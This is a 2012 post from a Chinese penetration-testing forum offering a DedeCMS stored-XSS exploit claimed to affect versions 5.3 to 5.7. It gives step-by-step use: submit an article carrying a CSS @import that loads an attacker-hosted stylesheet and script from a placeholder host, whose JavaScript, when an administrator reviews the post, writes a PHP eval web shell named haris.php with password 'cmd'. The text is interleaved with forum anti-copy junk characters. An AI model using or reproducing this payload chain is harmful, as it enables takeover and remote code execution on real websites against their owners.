找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2102|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell* z% E5 k4 j/ E0 W/ ~  J
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
, \! `# T9 e$ O0 ~目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。2 b. l* ?$ W4 t9 `  ]- p; R; j
下面说说利用方法。
' ?- y. I& ]8 z0 O6 m9 _5 L条件有2个:
' t! ]1 r0 a+ l) J6 |$ w$ a1.开启注册
0 j8 s  l( I. M2.开启投稿, a( r2 j% v( k( D
注册会员----发表文章( l' ]  A( ~$ w# P* d7 X
内容填写:. t6 _7 t$ b( K! t
复制代码7 s3 G0 Z' {/ e1 J
<style>@im\port'\http://xxx.com/xss.css';</style>
/ }% l- R  F. \9 T  N新建XSS.Css4 |( W9 z. I# x; l4 q  C
复制代码
2 }  G  B% }$ j* \5 X$ Q; M) \( n.body{0 B$ q3 c8 H! `! B, D4 W2 F2 d0 U; o
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
, p- x1 S! z5 D* R7 C% n新建xss.js 内容为8 m- Q" L+ ]& B! Q
复制代码
  Q# j, w. \6 x) O1.var request = false;) L1 m1 K3 \! {8 R) ~7 z$ U
2.if(window.XMLHttpRequest) {/ d+ \/ J& X8 X+ C5 L8 ]
3.request = new XMLHttpRequest();! \5 `3 j+ w) f1 l
4.if(request.overrideMimeType) {5 Y% t4 n* [/ Y" `1 l
5.request.overrideMimeType('text/xml');
- C" B4 t  }$ T6 O' |% s6.}
* n) F+ Y5 @* o' u) }7.} else if(window.ActiveXObject) {& d$ `6 Y8 p0 J  \6 V
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
! W7 A; o' P/ \! [/ o, m9.for(var i=0; i<versions.length; i++) {, a- s' ~( x2 e, k3 S
10.try {" t/ b' N0 P- K( i
11.request = new ActiveXObject(versions);  Z5 b- `1 g, C, _; K( r6 ~
12.} catch(e) {}
# w0 V! [0 z3 p13.}6 E( v/ m' D7 T3 n7 k, u8 t/ X% o
14.}
( \' D1 o0 U: [) r3 b7 X15.xmlhttp=request;
$ u* B) g! ~% E7 d2 V3 E16.function getFolder( url ){  q( s7 A  E7 x' |1 u! z* n
17. obj = url.split('/')0 o. u4 h$ a, a* F3 |/ p1 c/ ?1 ]
18. return obj[obj.length-2]
7 o8 p2 T5 a2 {3 w% s19.}6 V5 e2 z1 C# G# e
20.oUrl = top.location.href;
! ?5 b* x2 ^. ]1 O/ q' j21.u = getFolder(oUrl);) J  E1 R* D$ c7 B+ s+ O) n  J
22.add_admin();
' A1 U. A8 H, m8 l- N' G; C' y23.function add_admin(){
8 m  H8 {) ^/ U5 \4 }9 c24.var url= "/"+u+"/sys_sql_query.php";1 y) j' P* F6 m
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";* b7 Q6 c- }9 n7 Q' @0 x
26.xmlhttp.open("POST", url, true);
; y1 g! m4 M, G) x# ]27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");' `, ^! O& Z+ g7 W& h) T* U
28.xmlhttp.setRequestHeader("Content-length", params.length);, k* n1 j" ?# Z. u$ _
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");, W, Y  G3 ~* a5 d' G
30.xmlhttp.send(params);
* G2 |4 p6 _4 ]6 _31.}3 d& U1 L, P2 h- u/ W, w! U
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表